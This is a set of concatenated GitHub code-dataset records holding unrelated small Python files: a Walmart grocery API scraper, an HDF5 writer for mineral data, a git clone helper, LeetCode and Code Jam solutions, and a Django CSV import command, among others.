\"ESTADO_ORDENCLIENTE\" : ESTADO_ORDENCLIENTE,\n        \"ESTADO_MESERO\" : ESTADO_MESERO,\n    }\n    return data\n\n\n\n\ndef 
pagarOrdenCliente(id_cliente,id_mesa):\n django_cursor = connection.cursor()\n cursor = django_cursor.connection.cursor()\n v_Salida = cursor.var(cx_Oracle.NUMBER)\n\n cursor.callproc(\"sp_pagarOdenProducto\", [id_cliente,id_mesa,v_Salida])\n\n return v_Salida.getvalue()\n\n\n\n\n\n","repo_name":"Alcronx/Portafolio-Ingenieria","sub_path":"Django/src_Restaurant/Modulos/ApiRestaurantApp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41659445102","text":"#import numpy as np\nimport cv2\n\ncap = cv2.VideoCapture(0)\n\nwhile(True):\n ret, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n cv2.imshow('Video', frame)\n cv2.imshow('Frame', gray)\n cv2.imshow('Color', frame[ :, :, 0 ])\n print(frame)\n #print(gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n cv2.imwrite(\"B:\\\\VideoPyCharm\\\\frame.jpg\", frame)\n break\ncap.release()\ncv2.destroyAllWindows()","repo_name":"EVGENIIDIULDIN/Temp-program","sub_path":"UZGU_programm/SWSU_new/Cadr_camera/videos.py","file_name":"videos.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36992494295","text":"class Solution:\n def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n i, j = 0, 0\n nums1_copy = nums1[:m]\n nums1[:] = []\n\n while i < m and j < n:\n if nums1_copy[i] < nums2[j]:\n nums1.append(nums1_copy[i])\n i += 1\n else:\n nums1.append(nums2[j])\n j += 1\n\n if i < m:\n nums1[i + j:] = nums1_copy[i:]\n if j < n:\n nums1[i + j:] = nums2[j:]","repo_name":"algorithm006-class02/algorithm006-class02","sub_path":"Week_01/G20200343030638/LeetCode_88(2)_638.py","file_name":"LeetCode_88(2)_638.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"} +{"seq_id":"70562908035","text":"import urllib.request\nimport urllib.parse\nimport re\nimport json\n\n\nclass ProductDetail:\n def __init__(self, name: str, imageUrl: str, price: float, quant: float, quantType: str):\n self.name = name\n self.imageUrl = imageUrl\n self.price = price\n self.quant = quant\n self.quantType = quantType\n \n\n def getName(self):\n return self.name\n\n def getImageUrl(self):\n return self.imageUrl\n \n\n def getPrice(self):\n return self.price\n \n\n def getQuant(self):\n #Returns quantity amount like 16\n # Returns quantity amount like 16\n return self.quant\n \n\n def getQuantType(self):\n #Returns quantity type like fl oz\n # Returns quantity type like fl oz\n return self.quantType\n\n\nclass WalmartApi:\n\n def __init__(self):\n self.baseUrl = \"https://grocery.walmart.com/v4/api/products\"\n\n def query_search(self, search_query: str) -> ProductDetail:\n return self.getNameImagePriceQuant(self.getResult(self.buildSearchUrl(search_query)))\n\n def buildSearchUrl(self, search_query: str, store_id: str = 5609) -> str:\n #Temporary store_id\n query_parameters = [\n ('storeId', store_id),\n ('query', search_query),\n ('count', 60),\n ('page', 1),\n ('offset', 0)\n ]\n return self.baseUrl + '/search?' 
+ urllib.parse.urlencode(query_parameters)\n\n    def getResult(self, url: str) -> dict:\n        response = None\n        \n\n        try:\n            response = urllib.request.urlopen(url)\n            json_text = response.read().decode(encoding = 'utf-8')\n            \n            return json.loads(json_text)\n        \n\n        finally:\n            if response is not None:\n                response.close()\n\n    def getNameImagePriceQuant(self, results: dict) -> ProductDetail:\n\n        possibleQuants = [\n            ' each',\n            ' bunch',\n            ' count',\n            ' fl oz',\n            ' fluid ounce',\n            ' oz',\n            ' gal',\n            ' lb',\n            ' bag',\n            '-ounce',\n            ' pint',\n            ' gallon',\n            ' ounce',\n            ' QT'\n        ]\n\n        prodResults = results['products'][0]\n\n        name = prodResults['basic']['name']\n        img = prodResults['basic']['image']['thumbnail']\n        price = prodResults['store']['price']['list']\n        quant = \"\"\n        quantType = \"\"\n\n        productUrl = prodResults['basic']['name'].lower()\n\n        # Attempts to isolate the quantity and quantity type in the name\n        for qType in possibleQuants:\n            if qType in productUrl:\n                if(qType == \"-ounce\"):\n                    qType = \" oz\"\n                    productUrl = productUrl.replace(\"-ounce\", \" oz\")\n                qLen = len(qType)\n                qIndex = productUrl.find(qType)\n                quant = productUrl[(qIndex-5):(qIndex+qLen)].strip()\n                quantType = qType\n                break\n\n        # Special case if the quantity is each or bunch\n        if(quantType != \" each\" and quantType != \" bunch\"):\n\n            match = re.search(r\"\\d\", quant)\n\n            # re.search returns None when no digit is found, so test the match object itself\n            if match is not None:\n                quant = quant[match.start():]\n\n        elif(quantType == \" each\"):\n            quant = quant[quant.find(\"each\"):]\n            quant = \"1 \" + quant\n\n        elif(quantType == \" bunch\"):\n            quant = \"4 count\"\n\n        quant = quant.split()\n        product = ProductDetail(name, img, price, float(quant[0].split('-')[0]), quant[1])\n\n        return product \n","repo_name":"costajoshua27/reFresh","sub_path":"APIs/walmartRetrieval.py","file_name":"walmartRetrieval.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23447566881","text":"\r\n# coding: cp932\r\n\r\nlines = iter('''\r\n2\r\n4 2\r\nAAA\r\nAAB\r\nAB\r\nB\r\n5 2\r\nA\r\nB\r\nC\r\nD\r\nE\r\n'''.splitlines(False)[1:])\r\n\r\n\r\nfrom math import sqrt\r\nfrom datetime import datetime\r\nimport sys\r\nclass Out:\r\n\tdef __init__(me, f):\r\n\t\tme.file = f\r\n\tdef write(me, *args):\r\n\t\tsys.stdout.write(*args)\r\n\t\tme.file.write(*args)\r\nout = sys.stdout\r\n#sys.setrecursionlimit(1500)\r\n\r\n#from decimal import Decimal, getcontext\r\n#getcontext().prec = 64\r\n\r\ndate = datetime.now().strftime('%Y%m%d-%H%M%S')\r\n\r\ninfile = 'D-small-attempt0.in'\r\n#infile = 'B-large-practice.in'\r\nlines = iter(open(infile).read().splitlines(False))\r\nout = Out(open(infile[:-3] + (date + '.answer'), 'w'))\r\n\r\nimport time\r\nfrom collections import namedtuple, defaultdict\r\nfrom itertools import count, product, combinations\r\nfrom ctypes import*\r\n\r\nfrom copy import deepcopy\r\n\r\nMAX = float('inf')\r\n\r\nimport sys\r\nsys.setrecursionlimit(1500)\r\n\r\nfrom math import log, cos, sin\r\nimport time\r\nimport inspect\r\n\r\n#print(setup(3, 4))\r\n\r\nMIN = -float('inf')\r\nMAX = float('inf')\r\n\r\ndef gdc(P,Q):\r\n\tr = P%Q\r\n\tif r == 0:\r\n\t\treturn Q\r\n\treturn gdc(Q,r)\r\n\t\r\n\t\r\n\t\t\r\n\r\n#T = Union(100)\r\n#print(T.top(1))\r\n#print(T.tail(1))\r\n#T.combine(1,0)\r\n#print(T.top(1))\r\n#print(T.tail(1))\r\n\r\nie = enumerate\r\nir = range\r\nic = combinations\r\nip = product\r\n\r\nMOD = 1000000007\r\n\r\ndef solve(M,N,S):\r\n\tG = [[0]*M 
for i in ir(M)]\r\n\tfor i,j in ic(ir(M), 2):\r\n\t\ts = S[i]\r\n\t\ts2= S[j]\r\n\t\tfor n in ir(min(len(s), len(s2))):\r\n\t\t\tif s[n] != s2[n]:break\r\n\t\telse:\r\n\t\t\tn += 1\r\n\t\tG[i][j] = n\r\n\t\tG[j][i] = n\r\n\tfor g in G:print(g)\r\n\t#print(M,N,S)\r\ndef solve(M,N,S):\r\n\tans = 0\r\n\tcnt = 0\r\n\tused = set()\r\n\tfor n in range(N**M):\r\n\t\tD = [0]*M\r\n\t\tfor i in ir(M):\r\n\t\t\tD[i] = n%N\r\n\t\t\tn //= N\r\n\r\n\t\t#temp = ['']*N\r\n\t\t#for i,s in ie(S):\r\n\t\t#\ttemp[D[i]] += s\r\n\t\t#temp.sort()\r\n\t\t#temp = tuple(temp)\r\n\t\t#if temp in used:\r\n\t\t#\tcontinue\r\n\t\t#used.add(temp)\r\n\t\t\r\n\t\t#temp = [0]*N\r\n\t\t#for i in ir(N):\r\n\t\t#\ttemp[D[i]] += 1\r\n\t\t#if 0 in temp: continue\r\n\t\t\r\n\t\tT = [set() for _ in ir(N)]\r\n\t\tfor i,s in ie(S):\r\n\t\t\tt = T[D[i]]\r\n\t\t\tfor j,_ in ie(s):\r\n\t\t\t\tt.add(s[:j+1])\r\n\t\t#print(T)\r\n\t\tc = sum([len(t)+1 if t else 0 for t in T])\r\n\t\tif ans < c:\r\n\t\t\tans = c\r\n\t\t\tcnt = 1\r\n\t\telif ans == c:\r\n\t\t\tcnt += 1\r\n\t\t#ans = max(c,ans)\r\n\treturn '%d %d'%(ans, cnt)\r\n\t\r\n#dll = cdll.LoadLibrary(r'x64\\Release\\c.dll')\r\n#dll.solve.restype = c_int\r\n#dll.solve.argtypes= (c_int,c_int,c_int,CFUNCTYPE(None, c_void_p))\r\n\r\ncaseCnt = int(next(lines))\r\nfor case in range(1, caseCnt+1):\r\n\t(M,N) = map(int, next(lines).split())\r\n\tS = []\r\n\tfor _ in ir(M):\r\n\t\t(s,) = map(str, next(lines).split())\r\n\t\tS += [s]\r\n\tstart = time.time()\r\n\tprint('Case #%d:'%(case), solve(M,N,S), file=out)\r\n\tprint(time.time()-start)\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_151/64.py","file_name":"64.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26496741004","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n#uvozimo potrebne tabele\ntekmovalci = pd.read_csv('tekmovalci.csv')\njudoisti = pd.read_csv('judoisti.csv')\n\n\n#naredimo funkcije za grafe\ndef drzave(tabela):\n tabela.plot(kind='bar', \n x = 'drzava', xlabel= 'Država', ylabel= 'Število tekmovalcev',\n figsize=(15, 5))\n plt.title('Število tekmovalcev v posamezni državi')\n plt.show()\n \n \n\ndef najboljsi_leto(tabela):\n nova_tabela_leto = pd.DataFrame(columns=[\"leto\", \"ime\", \"število\"])\n for i in range(1960, 2024):\n a = tabela[tabela.datum == i]\n b = a.groupby('ime').size().sort_values(ascending=False).head(1)\n nova_tabela_leto.loc[-1] = [i, b.index[0], b.values[0]]\n nova_tabela_leto.index = nova_tabela_leto.index + 1\n \n nova_tabela_leto['leto, ime'] = nova_tabela_leto['leto'].map(str) + ', ' + nova_tabela_leto['ime']\n nova_tabela_leto.plot(kind='bar', x= 'leto, ime', y='število', xlabel='Leto, tekmovalec', ylabel='Število uspehov', figsize=(15, 5))\n plt.show()\n \n\ndef najboljsi_kategorija(tabela):\n nova_tabela_kategorija = pd.DataFrame(columns=[\"kategorija\", \"ime\", \"število\"])\n kategorije = ['U50','U55','U60','U66','U73','U81','U90','U100','O100','U40','U44','U48','U52','U57','U63','U70','U78','O78']\n for k in kategorije:\n a = tabela[tabela.kategorija == k]\n b = a.groupby('ime').size().sort_values(ascending=False).head(1)\n nova_tabela_kategorija.loc[-1] = [k, b.index[0], b.values[0]]\n nova_tabela_kategorija.index = nova_tabela_kategorija.index + 1\n\n nova_tabela_kategorija['kategorija, ime'] = nova_tabela_kategorija['kategorija'] + ', ' + nova_tabela_kategorija['ime']\n nova_tabela_kategorija.plot(kind='bar', x='kategorija, 
ime', y= 'število', xlabel='Kategorija, ime', ylabel='Število uspehov', figsize=(10, 4))\n plt.show()\n\ndef pop_tekme(tabela):\n popularne_tekme = tabela.groupby('dogodek').size().sort_values(ascending=False).head(50)\n popularne_tekme.plot(kind= 'pie', x='dogodek', figsize=(10, 12))\n plt.show()\n\ndef tekmovalci_slovenija(tabela):\n a = tabela[tabela.drzava == 'Slovenia'].groupby('datum').size()\n a.plot(kind= 'line', x= 'datum', xlabel= 'Leto', ylabel= 'Število aktivnih judoistov', figsize=(15,5))\n plt.title('Število aktivnih judoistov v sloveniji skozi leta')\n plt.show()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"BenjaminLevicar/Projektna-naloga","sub_path":"analiza_koda.py","file_name":"analiza_koda.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12696244823","text":"import h5py\nfrom pathlib import Path\nfrom datetime import date\n\n\nclass HDF5writer:\n def __init__(self, path_parent: str, filename: str) -> None:\n self.hdffile_path = Path(path_parent, filename + \".hdf5\")\n\n def write_file(self, rock_collection: list, element_list: list, init_parameters_TherCaller, author_name: str = \"unknown author\"):\n \"\"\"_summary_\n\n Args:\n rock_collection (list): _description_\n element_list (list): _description_\n init_parameters_TherCaller (pytheriak.wrapper.TherCaller): _description_\n author_name (str, optional): _description_. Defaults to \"unknown author\".\n \"\"\"\n with h5py.File(self.hdffile_path, \"w\") as hdf_file:\n hdf_file.attrs[\"date\"] = str(date.today())\n hdf_file.attrs[\"author\"] = author_name\n\n hdf_file.attrs[\"theriak_version\"] = init_parameters_TherCaller.theriak_version\n hdf_file.attrs[\"theriak_database\"] = init_parameters_TherCaller.database\n\n hdf_file.attrs[\"global element idx (bulk, phases)\"] = element_list\n\n for rock in rock_collection:\n # create a hdf_group for a Rock()-instance\n rock_group = hdf_file.create_group(str(rock))\n # save THERIN strings, to reproduce the minimisation\n rock_group.attrs[\"THERIN_PT\"] = rock.therin_PT\n rock_group.attrs[\"THERIN_bulk\"] = rock.therin_bulk\n\n # save physical params as attributes\n rock_group.attrs[\"P\"] = int(rock.pressure)\n rock_group.attrs[\"T\"] = int(rock.temperature)\n rock_group.attrs[\"G_system\"] = float(rock.g_system)\n rock_group.attrs[\"G_system_per_mol_of_input\"] = float(rock.g_system_per_mol_of_input)\n # save compositional data (bulk) as dataset, element_list acts as globally valid look-up table for idx --> element\n rock_group.create_dataset(\"bulk_composition_in_mol\", data=rock.bulk_composition_moles)\n rock_group.create_dataset(\"bulk_composition_in_mol_percent\", data=rock.bulk_composition_mol_percent)\n\n # make a sub-group for mineral_assemblage of the Rock()\n mineral_assemblage = rock_group.create_group(\"mineral_assemblage\")\n\n for mineral in rock.mineral_assemblage:\n mineral_group = mineral_assemblage.create_group(mineral.name)\n\n # save physical params as attributes\n mineral_group.attrs[\"n_moles\"] = mineral.n\n mineral_group.attrs[\"volume\"] = mineral.vol\n mineral_group.attrs[\"volume_percent_of_total_solids\"] = mineral.vol_percent\n mineral_group.attrs[\"density\"] = mineral.density\n # save mineral composition as dataset, element_list acts as globally valid look-up table for idx --> element\n mineral_group.create_dataset(\"phase_composition_apfu\", data=mineral.composition_apfu)\n mineral_group.create_dataset(\"phase_composition_moles\", 
data=mineral.composition_moles)\n\n # make a sub-group for fluid_assemblage of the Rock()\n fluid_assemblage = rock_group.create_group(\"fluid_assemblage\")\n\n for fluid in rock.fluid_assemblage:\n fluid_group = fluid_assemblage.create_group(fluid.name)\n\n # save physical params as attributes\n fluid_group.attrs[\"n_moles\"] = fluid.n\n fluid_group.attrs[\"volume\"] = fluid.vol\n fluid_group.attrs[\"density\"] = fluid.density\n\n fluid_group.create_dataset(\"phase_composition_apfu\", data=fluid.composition_apfu)\n fluid_group.create_dataset(\"phase_composition_moles\", data=fluid.composition_moles)\n\n # save deltaG of all metastable minerals for the Rock()\n metastable_minerals_dataset = rock_group.create_dataset(\"delta_G_meta-stable_minerals\", data=list(rock.mineral_delta_G.values()))\n metastable_minerals_dataset.attrs[\"mineral_names\"] = list(rock.mineral_delta_G.keys())\n metastable_minerals_dataset.attrs[\"unit\"] = \"joules\"\n","repo_name":"Theriak-Domino/pytheriak","sub_path":"src/pytheriak/hdfwriter.py","file_name":"hdfwriter.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"4886878860","text":"#For D4PG\nBUFFER_SIZE = int(1e6) # replay buffer size\nBATCH_SIZE = 128 # minibatch size\nGAMMA = 0.99 # discount factor\nTAU = 1e-3 # for soft update of target parameters\nLR_ACTOR = 1e-4 # learning rate of the actor, this time for D4PG we choose different lr for actor and critic \nLR_CRITIC = 1e-3 # learning rate of the critic\nWEIGHT_DECAY = 1e-5 #weight decay parameter for adam optimizer\nUPDATE_EVERY = 20\nLEARN_NUM = 10\nEPSILON = 1.0 # explore->exploit noise process added to act step for gaussian noise, works if eps_gauss=True in Agent\nEPSILON_DECAY = 1e-6 #for linear rate of decay \nATOMS=51 #number of atoms of categorical distribution\nROLLOUT_LENGTH=5 #rollout length taken for trajectory \nV_MAX=4 #V_MAX and V_MIN are gonna be the interval within which atoms reside\nV_MIN=0\nHARD_UPDATE=350 #hard update of target networks at each hard_update many steps \nSEED=1\n","repo_name":"mojishoki/DRL-Continuous_Control-P2","sub_path":"D4PG/hyperparameters.py","file_name":"hyperparameters.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18239654131","text":"import csv\n\nfrom django.core.management.base import BaseCommand\nfrom phones.models import Phone\nfrom datetime import datetime\nfrom decimal import Decimal\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **options):\n with open('phones.csv', 'r') as file:\n phones = list(csv.DictReader(file, delimiter=';'))\n\n for phone in phones:\n temp_date = datetime.strptime(phone['release_date'], \"%Y-%m-%d\").date()\n save_str = Phone(\n id=int(phone['id']),\n name=phone['name'],\n price=Decimal(phone['price'].replace(',', '.')),\n image=phone['image'],\n release_date=temp_date,\n lte_exists=bool(phone['lte_exists'])\n )\n save_str.save()\n","repo_name":"akosorukov90/dj_3_new","sub_path":"work_with_database/phones/management/commands/import_phones.py","file_name":"import_phones.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7525115255","text":"import json\nimport re\nimport subprocess\nfrom questionary import prompt\nimport os\n\nfrom goodgit.github import 
retrieve_github_access_token, get_github_username\n\ndef clone_repo(repo_link=None):\n config_path = os.path.expanduser(\"~/.ssh/goodgit/config.json\")\n \n # Check SSH connection first\n result = subprocess.run([\"ssh\", \"-T\", \"git@github.com\"], capture_output=True, text=True)\n \n if \"You've successfully authenticated\" not in result.stderr:\n print(\"SSH connection to GitHub failed.\")\n \n # Since SSH failed, now check if config file exists\n if not os.path.exists(config_path):\n print(\"\\033[91mConfig file does not exist.\\033[0m\")\n \n # Prompt to create new SSH account\n questions = [\n {\n 'type': 'confirm',\n 'name': 'create_account',\n 'message': 'Do you want to create a new SSH account?',\n 'default': False\n }\n ]\n answers = prompt(questions)\n if answers.get('create_account'):\n # Import and run the function from your SSH module\n from ..ssh.ssh import add_ssh_account\n add_ssh_account()\n return\n else:\n print(\"SSH connection to GitHub succeeded.\")\n \n # If the config file exists, read it\n if os.path.exists(config_path):\n try:\n with open(config_path, \"r\") as f:\n config = json.load(f)\n except Exception as e:\n print(f\"An error occurred while reading the config file: {e}\")\n return\n \n # If repo_link is not provided, ask user for it\n if repo_link is None:\n questions = [\n {\n 'type': 'text',\n 'name': 'repo_link',\n 'message': 'Enter the SSH or HTTPS link of the Git repo you want to clone:',\n }\n ]\n answers = prompt(questions)\n repo_link = answers['repo_link']\n \n # Validate and possibly convert link\n if re.match(r\"git@github\\.com:[\\w-]+/[\\w-]+\\.git\", repo_link):\n print(f\"SSH link provided: {repo_link}\")\n elif re.match(r\"https://github\\.com/[\\w-]+/[\\w-]+\\.git\", repo_link):\n print(f\"HTTPS link provided, converting to SSH: {repo_link}\")\n user_repo = repo_link.replace(\"https://github.com/\", \"\")\n repo_link = f\"git@github.com:{user_repo}\"\n print(repo_link)\n else:\n print(\"Invalid link provided.\")\n return\n \n # Check number of accounts in config\n if os.path.exists(config_path) and len(config[\"accounts\"]) > 1:\n email_options = [acc[\"email\"] for acc in config[\"accounts\"]]\n questions = [\n {\n 'type': 'select',\n 'name': 'email',\n 'message': 'Select the account to clone from:',\n 'choices': email_options,\n }\n ]\n answers = prompt(questions)\n selected_email = answers['email']\n \n access_token = retrieve_github_access_token(selected_email)\n github_username = get_github_username(access_token)\n \n selected_host = next(acc[\"host\"] for acc in config[\"accounts\"] if acc[\"email\"] == selected_email)\n \n # Replace github.com with selected host\n new_repo_link = repo_link.replace(\"github.com\", selected_host)\n print(f\"Cloning from {new_repo_link}\")\n subprocess.run([\"git\", \"clone\", new_repo_link])\n \n repo_folder_name = new_repo_link.split(\"/\")[1].split(\".\")[0]\n \n subprocess.run([\"git\", \"config\", \"--local\", \"user.name\", github_username], cwd=repo_folder_name)\n subprocess.run([\"git\", \"config\", \"--local\", \"user.email\", selected_email], cwd=repo_folder_name)\n\n else:\n print(f\"Cloning from {repo_link}\")\n subprocess.run([\"git\", \"clone\", repo_link])\n\n# For demonstration\nif __name__ == \"__main__\":\n clone_repo()\n\n","repo_name":"brainspoof/goodgit","sub_path":"goodgit/publish/clone.py","file_name":"clone.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} 
+{"seq_id":"42549506986","text":"class Solution(object):\r\n    def reverse(self, x):\r\n        \"\"\"\r\n        :type x: int\r\n        :rtype: int\r\n        \"\"\"\r\n        is_negative = x < 0\r\n\r\n        as_positive = abs(x)\r\n        rev_int = int(str(as_positive)[::-1])\r\n\r\n\r\n        return -1 * rev_int if is_negative else rev_int\r\n\r\n# r = Solution()\r\n\r\n# print (r.reverse(-213))\r\n","repo_name":"nmaswood/leetcode","sub_path":"todo/7-reverseInteger.py","file_name":"7-reverseInteger.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"70939830273","text":"# Exercise 072: Number in full\n# Make a program that has a tuple completely filled with a number in the full counter, from zero to twenty.\n# Your program must read a number (between 0 and 20) and show it in full.\n\nnumbers_in_full = ('zero', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten',\n                   'eleven', 'twelve', 'thirteen', 'fourteen', 'fifteen', 'sixteen', 'seventeen', 'eighteen',\n                   'nineteen', 'twenty')\nnumber = -1\nwhile number < 0 or number > 20:\n    number = int(input('Input here a number between zero and twenty: '))\n\nprint(f'You inputted the number {numbers_in_full[number]}')\n","repo_name":"hugolribeiro/Python3_curso_em_video","sub_path":"World3/exercise072.py","file_name":"exercise072.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11284293412","text":"import math\nimport pandas as pd\nimport Tool\n\nfilename = 'allowed_words.csv'\ndf = pd.read_csv(filename)\n\nword_dic = {}\nfor i in range(26):\n\tword_dic[df[\"letter\"][i]] = df[\"包含单词的个数\"][i]\nprint(word_dic)\n\nfilepath = 'data/test_words.txt'\n\nword_datas = []\n\ncount = Tool.get_txtLineNum(filepath)\nlistOfLines = Tool.get_txtfile(filepath)\nfor line in listOfLines:\n\tword = line.strip()\n\tletter_list = list(word)\n\titem_dic = {}\n\titem_dic[\"word\"] = word\n\tp = 1\n\tfor l in letter_list:\n\t\tp = p * (word_dic[l] / 12593) # 359 2309 12593\n\ti = -math.log2(p) # information entropy (bits)\n\titem_dic[\"p\"] = p\n\titem_dic[\"i\"] = i\n\tword_datas.append(item_dic)\nprint(word_datas)\n\nheader = ['word', 'p', 'i'] # data column names\ndatas = word_datas\n\nTool.csv_write('信息熵_allowed.csv',header=header,datas=datas)","repo_name":"ww-1009/2023MCM_C","sub_path":"python/比特.py","file_name":"比特.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39027734715","text":"def merge(L, temp, left, mid, right):\r\n    i, j, k, inv_count = left, mid + 1, left, 0\r\n    while i <= mid and j <= right:\r\n        if L[i] <= L[j]:\r\n            temp[k] = L[i]\r\n            k += 1\r\n            i += 1\r\n        else:\r\n            temp[k] = L[j]\r\n            inv_count += mid - i + 1\r\n            k += 1\r\n            j += 1\r\n    while i <= mid:\r\n        temp[k] = L[i]\r\n        k += 1\r\n        i += 1\r\n    while j <= right:\r\n        temp[k] = L[j]  # copy any remaining elements of the right half\r\n        k += 1\r\n        j += 1\r\n    for i in range(left, right + 1):\r\n        L[i] = temp[i]\r\n    return inv_count\r\n    \r\ndef mergeSort(L, temp, left, right):\r\n    inv_count = 0\r\n    if left < right:\r\n        mid = (left + right) // 2\r\n        inv_count += mergeSort(L, temp, left, mid)\r\n        inv_count += mergeSort(L, temp, mid+1, right)\r\n        inv_count += merge(L, temp, left, mid, right)\r\n    return inv_count\r\n\r\ndef countInversions(L):\r\n    N = len(L)\r\n    temp = [0] * N\r\n    return mergeSort(L, temp, 0, N-1)\r\n\r\nL = list(map(int, 
input().split()))\r\nprint(countInversions(L))","repo_name":"KARTHIKEYANC04052002/TECHDOSE-Assignments","sub_path":"Array/Counting Inversion.py","file_name":"Counting Inversion.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31829827336","text":"'''\n@Author: Pavan Nakate\n@Date: 2021-11-10 06:49\n@Last Modified by: Pavan Nakate\n@Last Modified time: None\n@Title : CountOfTrue : Print the count of True in the given dictionary \n'''\ndef true_count():\n    \"\"\"\n    Description:\n        This function prints the count of True in the given dictionary \n    Parameter:\n        None\n    Return:\n        None\n    \"\"\"\n    try:\n        sample_data = [{'id': 1, 'success': True, 'name': 'Lary'}, {'id': 2, 'success':False, 'name': 'Rabi'}, {'id': 3, 'success': True, 'name': 'Alex'}]\n        count = 0\n        for d in sample_data:\n            if d['success'] == True:\n                count += 1\n\n        print(\"Count of value 'True' is : \",count)\n\n    except Exception as e:\n        print(e)\n\nif __name__ == \"__main__\":\n    true_count()","repo_name":"Pavan699/Data-Structures","sub_path":"Dictionary/CountOfTrue.py","file_name":"CountOfTrue.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70722120196","text":"import logging\nfrom flask import Blueprint, request, render_template\nfrom utils import get_posts_by_user, view_bookmarks\n\nlogging.basicConfig(encoding=\"utf-8\", level=logging.INFO)\nusers_blueprint = Blueprint(\"users\", __name__)\n\n@users_blueprint.route(\"/users/<username>/\")\ndef posts_user(username):\n    \"\"\"View that shows all posts of a particular user\"\"\"\n    posts = get_posts_by_user(username)\n    bookmarks = view_bookmarks()\n    logging.info(f\"Requested the page of user {username}\")\n    return render_template(\"user-feed.html\", posts=posts, bookmarks=bookmarks)\n\n","repo_name":"AnastasiaGoryacheva/homework26-cw2","sub_path":"PycharmProjects/coursework2/users/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2020382585","text":"def main():\r\n    print(\"Welcome to Big Data Processing Application\\n\\\r\nPlease type the number that corresponds to which application you would like to run:\\n\\\r\nEnter 5 to exit:\\n\\\r\n1. Apache Hadoop\\n\\\r\n2. Apache Spark\\n\\\r\n3. Jupyter Notebook\\n\\\r\n4. 
SonarQube and SonarScanner\\n\")\r\n\r\n while(True):\r\n value = input(\"\")\r\n if value == \"1\":\r\n print(\"Activating Hadoop!\\n\")\r\n elif value == \"2\":\r\n print(\"Activating Spark!\\n\")\r\n elif value == \"3\":\r\n print(\"Activating Jupyter!\\n\")\r\n elif value == \"4\":\r\n print(\"Activating Sonar Stuff!\\n\")\r\n elif value == \"5\":\r\n quit()\r\n\r\nmain()","repo_name":"WalterDiong/14848-Cloud","sub_path":"Course_Project_Checkpoint_1/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71102030273","text":"from AthenaConfiguration.ComponentAccumulator import ComponentAccumulator\nfrom AthenaConfiguration.ComponentFactory import CompFactory\n\n\n# Main algorithm config\ndef FTAG3KernelCfg(flags, name='FTAG3Kernel', **kwargs):\n \"\"\"Configure the derivation framework driving algorithm (kernel) for FTAG3\"\"\"\n acc = ComponentAccumulator()\n \n from DerivationFrameworkFlavourTag.FTAG1 import FTAG1KernelCfg\n acc.merge(FTAG1KernelCfg(flags, name, TriggerListsHelper = kwargs['TriggerListsHelper']))\n\n # augmentation tools\n augmentationTools = []\n\n # skimming tools\n skimmingTools = []\n # filter leptons\n lepton_skimming_expression = 'count( (Muons.pt > 5*GeV) && (0 == Muons.muonType || 1 == Muons.muonType || 4 == Muons.muonType) ) >=1'\n FTAG3LeptonSkimmingTool = CompFactory.DerivationFramework.xAODStringSkimmingTool(\n name = \"FTAG3LeptonSkimmingTool\",\n expression = lepton_skimming_expression )\n acc.addPublicTool(FTAG3LeptonSkimmingTool)\n # filter large-R jets\n UFOjets_skimming_expression = 'count( AntiKt10UFOCSSKSoftDropBeta100Zcut10Jets.pt > 150*GeV ) >= 1' \n FTAG3UFOjetsSkimmingTool = CompFactory.DerivationFramework.xAODStringSkimmingTool(\n name = \"FTAG3UFOjetsSkimmingTool\",\n expression = UFOjets_skimming_expression )\n 